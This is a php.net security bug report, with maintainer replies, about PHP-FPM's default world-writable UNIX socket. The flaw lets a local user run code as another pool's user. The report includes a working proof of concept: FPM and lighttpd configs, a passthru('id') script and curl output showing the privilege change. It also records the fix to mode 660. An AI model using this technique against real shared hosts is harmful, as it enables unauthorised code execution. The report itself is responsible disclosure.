php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #67060 sapi/fpm: possible privilege escalation due to insecure default configuration
Submitted: 2014-04-12 21:32 UTC Modified: 2014-05-02 06:57 UTC
From: christian at hoffie dot info Assigned: stas
Status: Closed Package: FPM related
PHP Version: 5.6Git-2014-04-12 (Git) OS: *nix
Private report: No CVE-ID: 2014-0185
 [2014-04-12 21:32 UTC] christian at hoffie dot info
Description:
------------
Both default config [1] and compiled-in defaults [2] of sapi/fpm lead to configurations which easily allow any user with rights to connect to a UNIX socket to run arbitrary code with the permissions of the fpm user.

I agree that similar problems are to be expected when using TCP sockets, but as soon as an admin chooses to set the listen.user/listen.group options, it is expected that these restrictions are effective somehow (which they are not).

A typical scenario for this issue:
- shared hosting environment with multiple fpm pools, running with different permissions (user1, user2, ...)
- user1 can easily run code as user2 by pretending to be a FastCGI client and connecting to (e.g.) /var/run/php-fpm.user1.sock

Other scenarios are possible as well.

This is not a hypothetical issue, Ubuntu 14.04 allows running arbitrary code as the "www-data" user. I will file an Ubuntu bug for this shortly as well.

Current git (ca447a8f6f65be565301350e27e0f6a57369a0f9) is affected, but earlier versions are probably affected, too.

Regarding the handling of this issue:
I suspect that this issue is of different severity for you and for distros shipping with insecure default configs.

Would it be possible to keep this issue private and have no code committed yet, but to notify distros@openwall.org once a patch is ready?

Please let me know whether you are ok with this and whether you want me to handle distros@ contact.


[1] https://github.com/php/php-src/blob/php-5.5.11/sapi/fpm/php-fpm.conf.in#L172
[2] https://github.com/php/php-src/blob/php-5.5.11/sapi/fpm/fpm/fpm_unix.c#L31

Test script:
---------------
php-fpm.conf
------------

[global]
error_log = /tmp/php-fpm-vuln/php-fpm-error.log

[www]
user = user1
group = user1
listen = /tmp/php-fpm-vuln/sock
pm = dynamic
pm.max_children = 5 
pm.start_servers = 2 
pm.min_spare_servers = 1 
pm.max_spare_servers = 3 

$ sudo ./php-fpm -y php-fpm.conf
$ ls -l /tmp/php-fpm-vuln/sock
srw-rw-rw- 1 root root 0 Apr 12 12:49 sock


The issue should be obvious by now, but exploiting it is trivial as well, just point some FastCGI client at the socket.

For quick testing I used lighty:

user2@localhost:/tmp/lighty$ cat > lighttpd.conf
server.modules = ( "mod_fastcgi" )
fastcgi.server = (
        ".php" => (
                "" => (
                        "socket" => "/tmp/php-fpm-vuln/sock",
                        "check-local" => "enable"
                )
        )
)

server.port = 8000
server.document-root = "/tmp/lighty"

user2@localhost:/tmp/lighty$ vim lighttpd.conf 
user2@localhost:/tmp/lighty$ echo '<?php passthru("id");' > id.php
user2@localhost:/tmp/lighty$ lighttpd -f lighttpd.conf 
user2@localhost:/tmp/lighty$ curl http://localhost:8000/id.php
uid=1001(user1) gid=1001(user1) groups=1001(user1)


Expected result:
----------------
Sockets should be created with sane default permissions (0660).
Default config should suggest sane default permissions (0660).

The PoC should return some error code (depending on the FastCGI client; in my case: 503 Service unavailable) once this is fixed.

Actual result:
--------------
$ ls -l /tmp/php-fpm-vuln/sock
srw-rw-rw- 1 root root 0 Apr 12 12:49 sock

user2 can run code with the permissions of user1.

Patches

mode660 (last revision 2014-04-15 18:23 UTC) by stas@php.net)

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2014-04-15 18:23 UTC] stas@php.net
The following patch has been added/updated:

Patch Name: mode660
Revision:   1397586192
URL:        https://bugs.php.net/patch-display.php?bug=67060&patch=mode660&revision=1397586192
 [2014-04-15 18:24 UTC] stas@php.net
Mail to distros@openwall.org bounces for me, so attaching the patch here for now. Will wait till 5.4.28 with merge.
 [2014-04-22 09:01 UTC] stas@php.net
-CVE-ID: +CVE-ID: 2014-0185
 [2014-05-02 06:57 UTC] stas@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: stas
 [2014-05-02 06:57 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2014-05-12 17:44 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=8a22540a95db7c8a9857efc2ced8b91ceffda238
Log: Fix bug #67060: use default mode of 660
 [2014-05-19 06:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=8a22540a95db7c8a9857efc2ced8b91ceffda238
Log: Fix bug #67060: use default mode of 660
 [2014-05-26 06:32 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=8a22540a95db7c8a9857efc2ced8b91ceffda238
Log: Fix bug #67060: use default mode of 660
 [2014-05-26 06:50 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=8a22540a95db7c8a9857efc2ced8b91ceffda238
Log: Fix bug #67060: use default mode of 660
 [2014-05-26 06:53 UTC] dmitry@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=8a22540a95db7c8a9857efc2ced8b91ceffda238
Log: Fix bug #67060: use default mode of 660
 [2014-06-04 01:22 UTC] tyrael@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=8a22540a95db7c8a9857efc2ced8b91ceffda238
Log: Fix bug #67060: use default mode of 660
 [2014-10-07 23:15 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src-security.git;a=commit;h=8a22540a95db7c8a9857efc2ced8b91ceffda238
Log: Fix bug #67060: use default mode of 660
 [2014-10-07 23:15 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src-security.git;a=commit;h=35ceea928b12373a3b1e3eecdc32ed323223a40d
Log: Fix bug #67060: use default mode of 660
 [2014-10-07 23:26 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src-security.git;a=commit;h=8a22540a95db7c8a9857efc2ced8b91ceffda238
Log: Fix bug #67060: use default mode of 660
 [2014-10-07 23:26 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src-security.git;a=commit;h=35ceea928b12373a3b1e3eecdc32ed323223a40d
Log: Fix bug #67060: use default mode of 660
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Fri Aug 18 20:01:37 2017 UTC